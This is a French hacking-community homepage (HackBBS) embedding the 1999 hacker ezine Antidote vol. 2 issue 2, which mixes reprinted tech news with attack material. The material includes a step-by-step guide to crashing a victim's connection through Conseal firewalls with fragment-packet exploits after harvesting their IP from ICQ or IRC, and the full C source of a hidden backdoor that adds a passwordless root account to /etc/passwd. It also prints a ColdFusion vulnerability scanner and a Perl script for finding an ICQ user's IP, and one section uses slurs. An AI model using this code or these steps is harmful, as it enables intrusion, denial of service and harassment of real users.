CONNEXION ✔ Connexion INSCRIPTION ✔ Inscription Un Bug ? ✐ Un Bug?



Plateforme de Hacking

HackBBS.org est une communauté faisant évoluer un système de services vulnérables.
Nous apprenons à exploiter de manière collaborative des solutions permettant de détourner les systèmes d'informations.
Cet apprentissage nous permet alors d'améliorer la technologie, les relations humaines et les intérêts.
Nous défendons les valeurs de l'entraide et du challenge et contribuons
modestement à rendre l'expérience des utilisateurs finaux
la plus agréable possible.

L'irc est assez actif. Le forum doit être remplacé par une version plus moderne.
Il rentre donc à son tour dans la liste des cibles disponible.

La refonte est en version alpha. Cette nouvelle plateforme permet de pentester à distance sans avoir son matériel à disposition.
Via l'exécution de scripts python connecté en websocket à l'ihm web, nous pouvons piloter le chargement de scénario
d'attaque/défense en "multijoueur" ^^.
Le système permet de charger des scripts de bibliothèques partagées et de chiffrer les échanges selon les modules déployés.
Vous trouverez dans la rubrique article de nombreux tutoriels afin de mieux comprendre la sécurité informatique,
ainsi que différents articles plus poussés.
Hacker
  • Sniffing
  • Cracking
  • Buffer overflow
  • Créations d'exploits
  • Social engineering
  • L'anonymat sur le web, spoofing
  • Bypass-proxy, Bypass-firewall
  • Injection de code SSI, SQL, etc...
  • Utilisation d'exploits, création de scripts(php, irc, perl)
  • Cours en ligne
We make porn
Donate Button
Loading

Please Donate To Bitcoin Address: [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]
Nous vous recommandons de sniffer votre réseau lors de votre navigation sur le site. La refonte vous fournira un outillage pour réaliser vos attaques/défenses.
Flux RSS

flux RSS d'HackBBS Abonnez-vous. Soyez prévenu des tournois, challenges, actualités, ...
Recevez nos dernières actualités sur notre flux RSS.


Dernières mises à jour
Déploiement du vpn en mode TUN pour supporter les devices mobile Android.
Publication officielle de l'existence du FTP de hackBBS
Mise en place d'un nouveau système de publication d'article. Désormais, les contributeurs pourront aisément publier du contenu.
Implémentation d'un nouveau service vulnérable sur le dédié. (source du service dispo dans /usr/local/src/)
Création de 2 nouveaux comptes sur le dédié.
Mise en ligne de nouveaux articles sur les réseaux de neurones.
Premier tournois Battle-bot sur irc.hackint.eu.
Mise en production du flux rss.
Lancement du projet battle-bot. Ce projet est l'organisation et le développement d'un tournoi de bot sur #hackbbs-battle. Pour plus d'informations se référer à la section tournois dans le menu de gauche.
Mise en production de l'outil turtle search. Cet outil permet de chercher dans notre base de donnée les liens, documents, programmes, qui ont été utiles à la communauté.
Mise en place outil RSS. Nebojsa est nommé "responsable news". Cette responsabilité touche les nouvelles du site et les m-a-j effectué sur le flux rss.
M-a-j du syst. de ban anti-scan. Rien n'est fini, et scan autorisé ! C'est juste un challenge de plus, et le ban n'est que temporaire
M-a-j pages toolbox, merci à the-death pour sa contribution

Challenges
Vous pourrez également participer à de nombreux challenges en constant renouvellement (si possible :p)
Dernièrement, les missions relativent aux derniers produits open sources marchent bien :)

Votre ultime challenge sera de défacer HackBBS. De nombreuses failles sont présentes. A vous de les trouver et de les exploiter.

Cet ultime test permettra de constater votre réactions face à une faille.
Black ou White? ^^

Ezine du moment: vol2issue2.txt
Antidote Volume 2 Issue 2
(5/ /99)


           **                                             **                     
        *****                         *       *            **                  * 
       *  ***                        **      ***           **                 **        
          ***                        **       *            **                 **                 
         *  **                     ********                **      ****     ********        
         *  **       ***  ****    ********  ***        *** **     * ***  * ********   ***    
        *    **       **** **** *    **      ***      *********  *   ****     **     * *** 
        *    **        **   ****     **       **     **   ****  **    **      **    *   ***  
       *      **       **    **      **       **     **    **   **    **      **   **    *** 
       *********       **    **      **       **     **    **   **    **      **   ********  
      *        **      **    **      **       **     **    **   **    **      **   ******* 
      *        **      **    **      **       **     **    **   **    **      **   **        
     *****      **     **    **      **       **     **    **    ******       **   ****    * 
    *   ****    ** *   ***   ***      **      *** *   *****       ****         **   *******  
   *     **      **     ***   ***              ***     ***                           *****   
   *                                                                      
    ** 
                                                                   
       
   ------------------------------
	Well here is another ezine put out by Antidote. This is our 5th issue that has come out. We
	have over 380 subscribers so far and we hope to get more. Please keep in mind that this is
	an educational ezine in wich we are not responsible for any information on here that you might
	use in the wrong and improper way. Also, please keep in mind that just because we 'print' this
	information, that it doesn't mean that we made the thing or the exploit up. Most everything in
	this magazine is made by someone else and is recieved second hand (sent to us), in wich is
	printed/posted on here by us.


   --=\\Contents\\=--

	0.00 - Beginng
	   0.01 - What?
	   0.02 - FAQ
	   0.03 - Shouts
	   0.04 - Writing

	1.00 - News & Exploits
	   1.01 - Erasing Trails
	   1.02 - Domain Name Glitch
	   1.03 - Java Glitch
	   1.04 - Security Hole in Firewalls
	   1.05 - backdoor.c
	   1.06 - Cold Fusion Scanner
	   1.07 - UIN2IP

	2.00 - Misc.
	   2.01 - Hacking Group Report
	   2.02 - AntiOnline
	   2.03 - Cold Fusion
   ----------------------------



   --=\\0.00\\=--

   0.01 --=\\What?\\=--

	What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that
	would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically
	current news and happenings in the underground world. We aren't going to teach you how to
	hack or anything, but we will supply you with the current information and exploits. Mainly
	Antidote is just a magazine for people to read if they have some extra time on there hands
	and are bored with nothing to do. If you want to read a magazine that teaches you how to
	hack etc, then you might want to go to your local bookstore and see if they carry '2600'.

   ----------------------------


   0.02 --=\\FAQ\\=--
	Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
	Questions". Please read this before e-mailing us with questions and if the question isn't
	on here or doesn't make sense, then you can e-mail us with your question.

	> What exactly is "Antidote"?
	  See section 0.01 for a complete description.	
	
	> I find Antidote to not be shot for the beginner or does not teach you the basics, why is
	  that?
	  Antidote is for everyone, all we are basically is a news ezine that comes out once a
	  month with the current news, exploits, flaws and even programming. All of the articles
	  that are in here are recieved second hand (sent to us) and we very rarely edit anyone's
	  articles.

	> I just found Antidote issues on your webpage, is there anyway I can get them sent to me
	  through e-mail?
	  Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
	  input your e-mail address. You will recieve Antidote the second we release it and it
	  will be sent as an attachments
	
	> If I want to submit something, are there any 'rules'?
	  Please see section 0.03 for a complete description.
	
	> If I submitted something, can I remain anonymous?
	  Yes. Just make sure that you specify what information about yourself you would like to
	  be published above your article (when sending it to us) and we will do what you say.

	> I submitted something and I didn't see it in the current/last issue, why is that?
	  It could be that someone else wrote something similar to what you wrote and they sent it
	  to us first. If you sent us something and we didn't e-mail you back, then you might want
	  to send it again because we probably didn't get it (we respond to all e-mails no matter
	  what). We might use your article in future issues of Antidote.
	
	> Can I submit something that I didn't "discover" or "write"?
	  Yes you can, we take information that is written by anyone regardless if you wrote it or
	  not.
	
	Well thats it for our FAQ. If you have a question that is not on here or the question is
	on here and you had trouble understanding it, then please feel free to e-mail
	lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated
	every month.

   ----------------------------


   0.03 --=\\Shouts\\=--

	These are just some shout outs that we feel we owe to some people. Some are individuals
	and Some are groups in general. If you are not on this list and you feel that For some
	reason you should be, then please contact Lord Oak and he will post you on here and We
	are sorry for the Misunderstanding. Well, here are the shout outs:

			Duece				ox1dation
			Lord Oak			Forlorn
			Altomo				0dnek
			PBBSER				HNN [www.hackernews.com]
			Thepoison.org			Retribution
			403-security.org		EazyMoney

	Like we said above, if we forgot you and/or you think you should be added, please e-mail
	lordoak@thepoison.org and he will be sure to add you.

   ----------------------------


  0.04 --=\\Writing\\=--


	As many of you know, we are always open to articles/submittings. We will take almost
	anything that has to do with computer security. This leaves you open for:

	   -Protecting the system (security/securing)
	   -Attacking the system (hacking, exploits, flaws, etc....)
	   -UNIX (really anything to do with it...)
	   -News that has to do with any of the above....

	The only thing that we really don't take is webpage hacks, like e-mailing us and saying
	"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
	you have any questions about what is "acceptable" and not, please feel free to e-mail
	Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
	note that if we recieve two e-mails with the same topic/idea then we will use the one that
	we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has
	written about/on this topic so that way you don't waste your time on writing something that
	won't be published. An example of this would be:

	   If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday.
	   And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take
	   Joe's article because he sent it in first.

	But keep in mind, we might use your article for the next issue! If you have something that
	you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
	duece@thepoison.org  and we will review the article and put it in Antidote (if we like it).

   ----------------------------



   --=\\1.00\\=--

   1.01 --=\\Erasing Trails\\=--

	[www.wired.com]

	Email leaves a trail. Zero-Knowledge Systems is out to cover it up. 
	The Canadian privacy technology start-up said Monday that it had signed up 50 Internet 
	service providers and networks to its Freedom Network, a software-service combination 
	meant to bring more anonymity to Net users. 

	"This represents the first time that ISPs have taken concrete steps to address users' 
	privacy concerns," said Austin Hill, president of Zero-Knowledge Systems in a statement. 
	The company announced the news at this week's ISPCon in Baltimore. 

	Mail servers at participating ISPs and networks use the service to encrypt an email 
	message's data and route it via an untraceable path, Zero-Knowledge said. Zero-Knowledge 
	says the technique protects users from uninvited scrutiny of their online activities. 

	The 50 participating providers and networks -- which don't include any high-profile US 
	ISPs -- are located in the United States, Great Britain, the Netherlands, Japan, Canada, 
	Austria, and Australia. 

	Also announced at ISPCon on Monday was a plan by Inktomi and Sandpiper Networks to merge 
	two technologies that take different approaches to speeding the delivery of Web pages to 
	end users. 

	Sandpiper Networks said it plans to integrate its Adaptive Content Distribution 
	technology with Inktomi's Traffic Server network caching technology. 

	Inktomi's Web-caching technology creates local copies of an ISP's most frequently 
	requested pages for its users. The reactive process stores Web content according 
	to the frequency of customers' requests. 

	Sandpiper's Footprint service is driven more by the decisions of content providers. 

	Heavily visited Web sites sign up for Footprint to expressly get their content on the 
	geographically dispersed Sandpiper Footprint network. Both systems work on the principle 
	of reducing the network distance between users and Web-page content. 

	The companies said Inktomi's Traffic Server will provide cache platform to help power 
	Sandpiper's content servers for the Footprint network. 

	As part of the agreement, Inktomi has also agreed to invest in Sandpiper's $21.5-million, 
	second-round financing.  Other investors include America Online, Eagle New Media 
	Investment LLC, an investment affiliate of the Times-Mirror Company, and 
	Hambrecht & Quist.
	
     http://www.wired.com/news/news/technology/story/19327.html
   ----------------------------


   1.02 --=\\Domain Name Glitch\\=--

	[www.wired.com]

	As the "test period" for new domain name registrars officially began, Network Solutions 
	continued to suffer from technical glitches. 
	
	Work was completed on the Internic Registration Services database over the weekend. On 
	Monday, however, a problem at Network Solutions prevented some of its customers from 
	making changes to their domain names. 

	Network Solutions spokesperson Brian O'Shaughnessy tried to downplay the inconvenience. 
	"It runs the gamut from negligible to probably a fair level of nuisance to registrants 
	who are trying to do some changes to their site." 

	The Internic database generally lists technical, administrative, and billing contacts, 
	called "handles," for domain name owners. A user must use his or her handle to make 
	changes to a site. For example, if a domain administrator wanted to add to the domain a 
	server with a new IP address, he would have to use his handle -- often an email 
	address -- to notify Network Solutions of the change. 

	Some domain name handles started disappearing over the weekend, and Network Solutions 
	has yet to determine how many domain name holders have been affected. 

	"Some files just list the administrative and technical contacts and won't list the 
	billing contact,"  O'Shaughnessy said. 

	Some customers have complained that none of the contact listings appear for some 
	domains, which was confirmed by searching the Network Solutions database. 

	O'Shaughnessy insisted that the content of the database was still intact internally at 
	Network Solutions. 

	But some customers were outraged at another in a long string of failures by Network 
	Solutions.

	"The handle is the most important thing in the [registration] database," said Danish 
	Internet lawyer and author Dennis Willardt Zewillis. "It is a point of contact -- so that 
	only administrative or technical contact can change domain names around from server to 
	server."

	Zewillis' domain, domainnamelaw.com, was missing its contact information when he looked 
	it up on Friday night, and it was still missing on Monday. 

	"I think [Network Solutions was] trying to hide how easy it is to really mess up the 
	whole domain name system," Zewillis said. "And that's worrying me a lot. It's happening 
	every month." 

	In January, Zewillis alerted Network Solutions to a far more serious problem: Instead of 
	disappearing, domain name contacts were temporarily reassigned at random to people who 
	were not associated with those domains. 

	"They were changed so that other people's email addresses were listed as the email 
	contact," he said. "This gave the person listed as the contact the ability to make 
	changes to a domain." [A man in Canada who was assigned control over a spate of domains] 
	could have totally messed around with 100,000 domains." 

	Zewillis said that, at the very least, Network Solutions should have notified customers 
	about this problem. 

	Other users reported the same problem on Internet mailing lists on Monday. Some were 
	equally dissatisfied with Network Solutions' response that their contact information 
	would reappear at some point in the near future. 

	Derrick Bennett, who runs a domain name management company, agreed that it was the 
	latest in a series of problems. 

	"The only technical effect this has is in the time I have wasted calling NetSol's 
	non-800 number [to find out what was wrong] and the time I will spend next week checking 
	all of my domains again," said Bennett. 

	Two months ago, Bennett said a domain that his company managed was mistakenly redirected 
	to another Web site.  "They had done a global DNS change for another customer and 
	accidentally changed my customer's record to point at another DNS server." 

	It took two days to fix and cost his customer time and lost revenue "for something they 
	have no control over and no recourse for," Bennett said. 

	Network Solutions attributes the problems to the growth of the Internet. 

	"You're dealing with an industry that is essentially the fastest-growing segment of the 
	Internet," O'Shaughnessy said. "More people are getting on the Net and they have to go 
	through Network Solutions."

	http://www.wired.com/news/news/technology/story/19342.html
   ----------------------------


   1.03 --=\\Java Glitch\\=--

	There is a new bug that causes the Windows 95 and 98 operating system to crash. Joseph 
	Ashwood (the 'foudner') said that it keeps creating multiple computing processes called 
	"threads". What it does it is keeps creating these threads until the system runs out of 
	memory (or RAM) forcing you to reboot your computer.

	Microsoft and Sun identified or called this program a "denial of service attack" (or a 
	DOS). Considering that it overloads the system and slows it down.

	For more information, visit Joseph Ashwood's homepage wich is located at:
	
	http://www-scf.usc.edu/~ashwood
   ----------------------------


   1.04 --=\\Security Hole in Firewalls\\=--

	SECURITY HOLES IN CONSEAL PC FIREWALLS

	Anther seucrty hole in the Conseal PC Firewall a.k.a. signal9
	Just think of all the wanna be "hackers" that are going to crash cuz of this dos/oob
	atack. I think it is funny as hell.



	This trick works best with ICQ and IRC

	I write this for educational use only!!
	If you get kicked off your isp cuz you did not do it right it is your own damn falt not
	mine.

	Here we go,

	First off get the victims ip# off  ICQ or on IRC they could be spoofed type this to get
	a the real ip# on IRC /dns <there name>.Which gives:<therename>=+user@194.134.10.162.
	This is his true ip  #4. Now once again you /dns 194.134.10.162. This time, there is a
	response Resolved to <the dns user resolved> If he/she has you on there ignore list on
	ICQ then make another account and readd that uin# or Try to find some one there talking
	to that is on the victims list and is on your list too either way you'll get their ip#.
	What you got to do now is open a exploit (nestea or boink, newtear etc for Linux) (the
	best to use is Exploit Generator v0.85 for Windows) run a netstat "dns their ip#" get
	the port open from that host. You should now have the victims ip# and port , then send
	a packet just 1 from a regognized host they talk to seldomly "note" 79% firewall users
	have such fucked up rulsets or so many incoming hosts that they let 1 packet through.
	that packet is let through on their ruleset, so it registers =) ding! It may take a while
	for the packet to send the whole fragment but within a matter of seconds. Boom watch the
	dumb fuck go offline. There are other ways of forcing backdoors open on conseal PC
	firewall "considering it has 2 flaws" As to be said by many firewall annaylists "conseal 
	pc firewall" is the most secure firewall to prevent attacks against hackers. Well you
	annalzers check twice next time :) 

	This has been tested aginst win nt 4.0 win 95/98
	I would like to say about 99% considering you have some firewall warrior out amongst us.
	This is good to prove to pepole that think there really secure that thay ain't got shit
	basicly. Even lamers can prove them worng.

     EazyMoney	
     eazy_money@Cyber-Strike.com
   ----------------------------


   1.05 --=\\backdoor.c\\=--

	/* 
	A rip off a sockets tutorial i found somewhere cause I didn't feel like
	writing stupid basic sockets code when I had it in my src directory
	already.   
	*/ 

	/* Greets:
		Undernet Channels:
			#rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
		Groups:
			The LegionOOT (www.legionoot.cc), Team Sploit
		People:
			Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t,
			F-o-X, NeonMatrix, Azmodan, & Venomous
	/* 

	Usage (setup):
		# gcc -o backdoor backdoor.c
		# ./backdoor password &
	Usage (using):
		telnet to host (port 505) --> type the password (don't wait for a
		prompt, there isn't one so its less obvious its a backdoor) -->
		type 1or 2.  And yes it's _supposed_ to disconnect you after
		each command.
	*/

	 	#include <stdio.h>
	 	#include <stdlib.h>
	 	#include <errno.h>
	 	#include <string.h>
	 	#include <sys/types.h>
	 	#include <netinet/in.h>
	 	#include <sys/socket.h>
	 	#include <sys/wait.h>
	#define PORT 505
	#define MAXDATASIZE 100
	#define BACKLOG 10

	void handle(char *command);
	int main(int argc, char *argv[])
	{
	int sockfd, new_fd, sin_size, numbytes;
	char *bytes;
	struct sockaddr_in my_addr;
	struct sockaddr_in their_addr;

	char buf[MAXDATASIZE];
	char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to
	send '7h1s b0x 1s 0wn3d' to all people on the box: ";
		if (argc != 2) {
			fprintf(stderr,"Usage: %s password\n", argv[0]);
			exit(1);
		}
		if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
			perror("socket");
			exit(1);
		}
		my_addr.sin_family = AF_INET;
		my_addr.sin_port = htons(PORT);
		my_addr.sin_addr.s_addr = INADDR_ANY;
		if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
		{
			perror("bind");
			exit(1);
		}
			  	if (listen(sockfd, BACKLOG) == -1) {
					perror("listen");
					exit(1);

		  }

		  	while(1) {  /* main accept() loop */

					sin_size = sizeof(struct sockaddr_in);
				if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, \
																			 &sin_size)) ==
	{
					 perror("accept");
					 continue;
				}

	inet_ntoa(their_addr.sin_addr);
				if (!fork()) {
					 recv(new_fd, buf,
	MAXDATASIZE, 0);
				bytes = strstr(buf, argv[1]);

 
	if (bytes != NULL){

					send(new_fd, ask, sizeof(ask), 0);

					numbytes=recv(new_fd, buf,
	MAXDATASIZE, 0);
					buf[numbytes] = '\0';
					handle(buf);
					 }
					 close(new_fd);
					 exit(0);
				}
				close(new_fd);

				while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child
	processes */
		 }
	}

		void handle(char *command)
		{
		FILE *fle;
		if(strstr(command, "1") != NULL)
	{
		fle = fopen("/etc/passwd", "a+");
		fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
		fclose(fle);
	}
		if(strstr(command, "2") != NULL)
	{
		system("wall 7h1s b0x 1s 0wn3d");
	}
	}

     PBBSER
     pbbser@legionoot.hypermart.net
   ----------------------------


   1.06 --=\\Cold Fusion Scanner\\=--

       /*
       COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory
       "Cold Fusion Application Server Advisory" dated 4.20.1999
       you can find a copy of this advisory and all other
       l0pht Security Advisories here:
       http://www.l0pht.com/advisories.html
         
       much of this program was blatently copied from the cgi scanner released about
       a week ago, written by su1d sh3ll...  I just want to give credit where credit
       is due...  this particular scanner was "written" (basically modified) by
       hypoclear of lUSt - Linux Users Strike Today...  I know that it is trivial to
       check to see if a server is vulnerable, but I had fun doing this so who the
       heck cares if I want to waste my time...
       
       while I'm here I minds well give shout outs to:
       Phrozen Phreak (fidonet rules)
       Special K (you will never get rid of my start button ;-)
                       go powerpuff girls (he he) ;-)
       
       compile:   gcc -o coldscan coldscan.c
       usage:     coldscan host
       tested on: IRIX Release 5.3 (this should compile on most *NIX systems though)
       */
       
       
       #include <fcntl.h>
       #include <sys/types.h>
       #include <sys/socket.h>
       #include <netinet/in.h>
       #include <signal.h>
       #include <stdio.h>
       #include <string.h>
       #include <netdb.h>
       #include <ctype.h>
       #include <arpa/nameser.h>
       #include <sys/stat.h>
       #include <strings.h>
       #include <stdio.h>
       #include <stdlib.h>
       #include <unistd.h>
       #include <sys/socket.h>
       
       void main(int argc, char *argv[])
       {
        int sock,debugm=0;
        struct in_addr addr;
        struct sockaddr_in sin;
        struct hostent *he;
        unsigned long start;
        unsigned long end;
        unsigned long counter;
        char foundmsg[] = "200";
        char *cgistr;
        char buffer[1024];
        int count=0;
        int numin;
        char cfbuff[1024];
        char *cfpage[5];
        char *cfname[5];
       
       
        cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
        cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
        cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
        
       
        cfname[1] = "openfile.cfm           ";
        cfname[2] = "displayopenedfile.cfm  ";
        cfname[3] = "exprcalc.cfm           ";
       
       
        if (argc<2)
          {
          printf("\n-=COLD FUSION VULNERABILITY TESTER=-");
          printf("\nusage - %s host \n",argv[0]);
          exit(0);
          }
       
        if ((he=gethostbyname(argv[1])) == NULL)
          {
          herror("gethostbyname");
          exit(0);
          }
       
        printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n");
        printf("scanning...\n\n");
        start=inet_addr(argv[1]);
        counter=ntohl(start);
       
          sock=socket(AF_INET, SOCK_STREAM, 0);
          bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
          sin.sin_family=AF_INET;
          sin.sin_port=htons(80);
       
         if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
            {
            perror("connect");
            }
       
       
       while(count++ < 3)
          {
          sock=socket(AF_INET, SOCK_STREAM, 0);
          bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
          sin.sin_family=AF_INET;
          sin.sin_port=htons(80);
          if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
            {
            perror("connect");
            }
          printf("Searching for %s : ",cfname[count]);
       
          for(numin=0;numin < 1024;numin++)
             {
             cfbuff[numin] = '\0';
             }
        
          send(sock, cfpage[count],strlen(cfpage[count]),0);
          recv(sock, cfbuff, sizeof(cfbuff),0);
          cgistr = strstr(cfbuff,foundmsg);
          if( cgistr != NULL)
              printf("Exists!\n");
          else
              printf("Not Found\n");
             
            close(sock);
          }
        }
       
   ----------------------------


   1.06 --=\\UIN2IP\\=--

	#!/usr/bin/perl

	#
	# coded, (i.e. slapped together in a lazy-ass way) by Dr. Labrat
	#

	# Disclamer: If you use this to F*ck someone up, you are a bad, bad person. It wasn't me.
	# You are on your own.
	#
	# Simple- give it a UIN and it will try to give you the IP address of the 
	#victim.
	#
	# Only works if the user is online and is using the ICQ webserver, but then
	# that is probably what you need anyhow :-)

	# see www.labrat.cx for icqget.pl for getting files from the victim...

	# Thought for the day: Using this makes you a script-kiddie.
	#
	# Thx to Packet St0rm


	$uin=$ARGV[0];
	$iaddr= gethostbyname("members.icq.com");

		if ($uin) {
	$url = "/$uin";
		} else {
	die "No uin - Duh.\n";
	}

	use IO::Socket;
	use IO::Handle;

	$port = 80;


	$proto = getprotobyname("tcp");
	$paddr = sockaddr_in($port, $iaddr);


	print "ICQ UIN to IP rsolver, by Dr. Labrat\n";


	socket(DATA, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
	connect(DATA, $paddr) or die "Connect error: $!";
	autoflush DATA 1;

	print "Connected to members.icq.com...\n";
	print "Trying to resolve UIN: $uin\n";

	print DATA "GET $url HTTP/1.0\r\n\r\n\r\n";

	@data=<DATA>;

	if ( $data[0]=~/OK/){
		foreach $chunk (@data) {
			if ( $chunk=~/myhome.gif/) {
				print "Found UIN\n";
				$sneak=$chunk;
				last;
				}
			}
	} 

	if ($sneak) {
		print "Snarfed the IP address!\n";	
	} else {
		die "User not online or not running ICW webserver, maybe doesn't even exist!\n";
	}


	@ip=split(/\"/,$sneak);

	$realip=substr($ip[1], 7,15);

	print "\n$realip\n\n";

	print "Done....\n";

	close DATA;

   ----------------------------



   --=\\2.00\\=--

   2.01 --=\\Hacking Group Report\\=--

	With more and more people connecting to the Internet these days, there's bound to be 
	more new hackers and hacking groups.  In this issue of Antidote we will be looking at
	a group that goes by the name of "The Hong Kong Danger Duo".  

	They claim not to be elite, and they call themselves 'script kiddies', but "The Hong Kong
	Danger Duo" ( HKDD ) seems to be far from that.  They strike here and there, but when 
	they do, their creative and funny web pages are a site to behold.  The members of HKDD 
	which are Kung-P00, SpecialK, B0y wund3r, Jamaican J1m, Butt3ry L0bster M4n, and
	Phel0n bring a sense of humor to the otherwise dull and un-inventive web page hacks in
	resent history.  

	The HKDD are truly innovative and intelligent because they bring back the humor in 
	web page hacking.  Unlike most hacks that only have " w3 0wn j00.. fj34|2 0u|2 3|2337
	|20071n' 4b1l17135 f00" or something gay like that, the HKDD have creative and colorfull
	pages that poke fun at the admin, whoever they are flaming at that time, and show off
	their elite HTML skills.
	
	Hopefully in the near future, Antidote would like to have an interview with the HKDD.

	If you ever get the chance to see a HKDD hack, it's worth it.

     0dnek
   ----------------------------


   2.02 --=\\Antionline.com\\=--

	Yep.  Antionline.com.  It's gayer than ever.  With it's new site Anticode.com, 
	and the promotion of Caroline Meinel's "Hacker Wargames", John Varenimastupidbitch, 
	also known as JP, seems to be getting newer and gayer ideas to help Antionline.com 
	become somewhat popular, which will never happen.

	Anticode.com is played off to be a "Site for security consultants", which basically means
	that's it a cheap Rootshell.com rip-off.  It offers exploits, sniffers, and virus code 
	on it's web site to promote computer security.  Even though the exploits are organized 
	by OS and have descriptions by them, which is the only good thing about the entire 
	site, It still remains gay and doesn't need to be visited.
	
	Along with the gayness of Anticode.com, is the promotion of Caroline Meinel's "Hacker 
	Wargames".  The games seem to be posted and ran to help teach people about computer
	security without breaking the law.  "This isn't to train computer criminals" says one 
	site associated with the "Hacker Wargames".  But,  what else do they expect by offering 
	completely vunerable servers to the public without fear of getting busted?  Doesn't make
	much sense huh?
	
	The "Wargames" has a couple boxes open and a Cisco Router to hack into, also.  Along with
	these boxes, are hints to l/p's for each box and for the Cisco Router, so someone looking
	to learn a little bit more about computer security can log into the box of their choice
	and attempt to root the server.  The award for wasting your time is your own personal
	web page on the server you rooted.  But remember, their not trying to train computer
	criminals.

     0dnek
   ----------------------------


   2.03 --=\\Cold Fusion\\=--

	As many of you saw last issue, we had the new cold fusion vulnerability. This has caused
	a lot of problems for many servers and virtualy hosted domains. Many sites have been 
	vandalized because of this bug and it has happened repeatedly to each server / domain.
	An example of this would be: www.towngreen.com, they have been hacked 8 times, in wich 4
	of them were because of the cold fusion vulnerability. Many sites / servers are finally
	picking up on this and fixing it. Since all of the servers are fixing this problem, the
	press is picking up on it also, here is an article that I found on ZDNet:


	Article from: http://www.zdnet.com/zdnn/stories/news/0,4586,1014542,00.html
	Hackers whack ColdFusion users
 
	By Jim Kerstetter and Antone Gonsalves, PC Week
	April 29, 1999 3:09 PM PT 


	New research on a five-month-old security vulnerability has put hackers on the prowl and
	a software company on the hot seat. 

	Last week, L0pht, a site that devotes itself to discussions on computer security, posted
	a warning about a vulnerability in the remote administration features of Allaire Corp.'s
	ColdFusion Application Server 

	The vulnerability enables a hacker to gain access to all the data stored on that Web
	server and, in the process, install software to create a back door into the rest of the
	network. 

	Since that warning was posted last week -- along with a patch from Allaire (Nasdaq:ALLR)
	-- security experts estimate that more than 100 sites have been hit. 

	Example app is to blame
	Adam Berrey, product marketing director for ColdFusion, said the security breach
	resulted from an example application that shipped with the server's documentation. Once
	the application was deployed, a hacker could use it as a doorway to files on the server. 

	"In February, when we first discovered this issue, we sent out an e-mail to all of our
	registered customers, and we also proactively contacted all of our key accounts," Berrey
	said. "We may not have the name of every single customer in our database but I think
	we've done a very aggressive job." 

	But customers are questioning whether Allaire did do enough to warn them. One of the
	companies that was missed was NetGrocer Inc., of New York. 

	Ari Sabah, vice president of technology, said one of his developers learned of the
	problem from an e-mail sent by a friend who also worked with ColdFusion. The security
	flaw and the availability of a patch on Allaire's Web site had been discussed on the
	site's discussion group. 

	"Officially, we didn't get anything from [Allaire]," said an annoyed Sabah. "They were
	too busy going public. They forgot their customers and they forgot who got them there." 

	Berrey said a patch for the problem was posted on Allaire's Web site during the first
	week of February and a maintenance release of the server, ColdFusion 4.01, will be
	available Friday for free download from the company's site. 

	Hard hit
	Still, the ColdFusion hack is not necessarily new. In December, Phrack Magazine first
	publicized the vulnerability. But it wasn't until the past several weeks that it gained
	the attention of hackers, who have made it clear that many ColdFusion users haven't
	installed the patch. One site, a West Coast ISP that hosts at least 30 domains, was
	particularly hard hit.

	A hacker, going by the name of MostHateD of GlobalHell, was able to penetrate the
	company's Web server and gain access to at least three hard drives. In the process, the
	hacker claimed to have gained access to banking records, mail server passwords, illegally
	copied software, and even a "nuke" utility -- an illegal piece of software that can be
	used to launch a denial of service attack against another server. 

	The vulnerability ties into remote administration tools with ColdFusion that are exposed
	by the sample application. Allaire has its own server-side scripts, similar to CGI, that
	can be manipulated by an attacker. Once inside, the attacker can upload and download files
	and replace binary files, said Chris Rouland, director of Internet Security Systems Inc.'s
	X-Force consulting group. 

	Rouland analyzed the attack after being alerted to it by PC Week.

	"If you can replace a binary on a computer system, you can back door it and force it to
	do whatever you want to do," he said. 

	Allaire, of Cambridge, Mass., completed its initial public offering of 2.5 million shares
 	in January.

	
	If you don't know what the Cold Fusion Vulnerability is,
	then please see Antidote Vol2 Issue1

     Lord Oak
     lordoak@thepoison.org
   ----------------------------

           			_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
           			_|				      _|
	   			_|  _|    _|  _|      _|  _|      _|  _|
	   			_|  _|    _|  _|_|    _|  _|_|    _|  _|
	   			_|  _|_|_|_|  _|  _|  _|  _|  _|  _|  _|
	   			_|  _|    _|  _|    _|_|  _|    _|_|  _|
	   			_|  _|    _|  _|      _|  _|      _|  _|
           			_|    Antidote is an HNN Affiliate    _|
           			_|     http://www.hackernews.com      _|
	   			_|				      _|
           			_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|


	All ASCII art in Antidote is done by Lord Oak and permission is needed before using it.
	Copyright Thepoison.org 1998, all rights reserved.





Manifest
Le but de ce site est de mieux comprendre la sécurité informatique.
